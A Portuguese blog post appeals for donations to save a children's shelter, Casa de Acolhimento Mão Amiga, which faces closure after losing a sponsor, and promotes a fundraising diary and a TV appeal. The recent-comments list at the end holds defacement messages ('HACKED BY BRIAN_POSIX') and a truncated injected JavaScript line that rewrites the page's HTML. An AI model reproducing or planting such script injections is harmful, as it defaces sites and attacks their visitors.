De forma inesperada foi posta em causa a sustentabilidade da Associação não nos parecendo viável e possível a curto prazo encontrar uma alternativa para financiar a continuidade do nosso trabalho e atividade.
Este facto abrupto, que lamentamos, é alheio à nossa vontade e compreensão, e pode resultar no encerramento de um projeto de longa data e colocar um ponto final na história da nossa Instituição.


Todos os dias durante a nossa atividade, foi feito um esforço e investimento de meios e pessoas que foram dando o seu tempo, a sua dedicação e a sua imagem para um trabalho digno, honesto de proteção e cuidados especiais a crianças que nos foram confiadas, com o objetivo de lhes proporcionarmos um presente protetor e um futuro promissor e mais risonho.

 

O cancelamento do contributo de 50% de um dos patrocinadores e a falta de apoios geral para o próximo ano, torna inviável a continuação do trabalho desta instituição. Se nos próximos dias não for encontrada uma forma de financiamento a Casa de Acolhimento Mão Amiga vai mesmo ter que fechar portas.

 

A instituição precisa de apoios no valor de 10 mil euros mensais. E embora a situação financeira de todas não seja a melhor, todos podemos ajudar com o pouco que seja.

 

Ajude! Estas crianças precisam de futuro melhor!

 

Pela primeira vez em onze anos de existência concretizámos um projeto que em muito valida o nosso trabalho, a nossa Agenda 2013.
Pelo exposto apelamos a todos os que nos quiserem apoiar e ajudar a assegurar os cuidados às 14 crianças acolhidas que adquiram a nossa Agenda personalizada por, no mínimo, 5 Mãos Amigas. Toda a ajuda é bemvinda.

 

Esta segunda-feira, às 17:30 não perca o apelo da Casa de Acolhimento da Mão Amiga na SIC Mulher.

 

Ajude...

 

Veja o vídeo aqui!



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO